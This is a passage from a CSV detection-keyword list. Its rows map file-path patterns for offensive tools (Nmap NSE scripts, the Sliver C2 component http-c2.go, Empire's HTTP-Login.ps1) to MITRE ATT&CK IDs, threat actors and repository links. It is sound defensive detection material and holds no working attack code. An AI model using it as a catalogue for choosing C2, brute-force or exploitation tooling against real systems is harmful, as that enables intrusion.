Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-c2.go*",".{0,1000}\/http\-c2\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/http-cakephp-version.nse*",".{0,1000}\/http\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-chrono.nse*",".{0,1000}\/http\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cisco-anyconnect.nse*",".{0,1000}\/http\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-coldfusion-subzero.nse*",".{0,1000}\/http\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-comments-displayer.nse*",".{0,1000}\/http\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-config-backup.nse*",".{0,1000}\/http\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cookie-flags.nse*",".{0,1000}\/http\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cors.nse*",".{0,1000}\/http\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cross-domain-policy.nse*",".{0,1000}\/http\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-csrf.nse*",".{0,1000}\/http\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-date.nse*",".{0,1000}\/http\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-default-accounts.nse*",".{0,1000}\/http\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-devframework.nse*",".{0,1000}\/http\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-dlink-backdoor.nse*",".{0,1000}\/http\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-dombased-xss.nse*",".{0,1000}\/http\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-domino-enum-passwords.nse*",".{0,1000}\/http\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-drupal-enum.nse*",".{0,1000}\/http\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-drupal-enum-users.nse*",".{0,1000}\/http\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-enum.nse*",".{0,1000}\/http\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-errors.nse*",".{0,1000}\/http\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-exif-spider.nse*",".{0,1000}\/http\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-favicon.nse*",".{0,1000}\/http\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-feed.nse*",".{0,1000}\/http\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-fetch.nse*",".{0,1000}\/http\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-fileupload-exploiter.nse*",".{0,1000}\/http\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-form-brute.nse*",".{0,1000}\/http\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-form-fuzzer.nse*",".{0,1000}\/http\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-frontpage-login.nse*",".{0,1000}\/http\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-generator.nse*",".{0,1000}\/http\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-git.nse*",".{0,1000}\/http\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-gitweb-projects-enum.nse*",".{0,1000}\/http\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-google-malware.nse*",".{0,1000}\/http\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-grep.nse*",".{0,1000}\/http\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-headers.nse*",".{0,1000}\/http\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-hp-ilo-info.nse*",".{0,1000}\/http\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-huawei-hg5xx-vuln.nse*",".{0,1000}\/http\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-icloud-findmyiphone.nse*",".{0,1000}\/http\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-icloud-sendmsg.nse*",".{0,1000}\/http\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-iis-short-name-brute.nse*",".{0,1000}\/http\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-iis-webdav-vuln.nse*",".{0,1000}\/http\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-internal-ip-disclosure.nse*",".{0,1000}\/http\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-joomla-brute.nse*",".{0,1000}\/http\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-jsonp-detection.nse*",".{0,1000}\/http\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-lexmark-version.nse*",".{0,1000}\/http\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/http-lfi.nse*",".{0,1000}\/http\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-litespeed-sourcecode-download.nse*",".{0,1000}\/http\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HTTP-Login.ps1*",".{0,1000}\/HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/http-ls.nse*",".{0,1000}\/http\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-majordomo2-dir-traversal.nse*",".{0,1000}\/http\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-malware-host.nse*",".{0,1000}\/http\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-mcmp.nse*",".{0,1000}\/http\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-methods.nse*",".{0,1000}\/http\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-method-tamper.nse*",".{0,1000}\/http\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-mobileversion-checker.nse*",".{0,1000}\/http\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-nikto-scan.nse*",".{0,1000}\/http\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
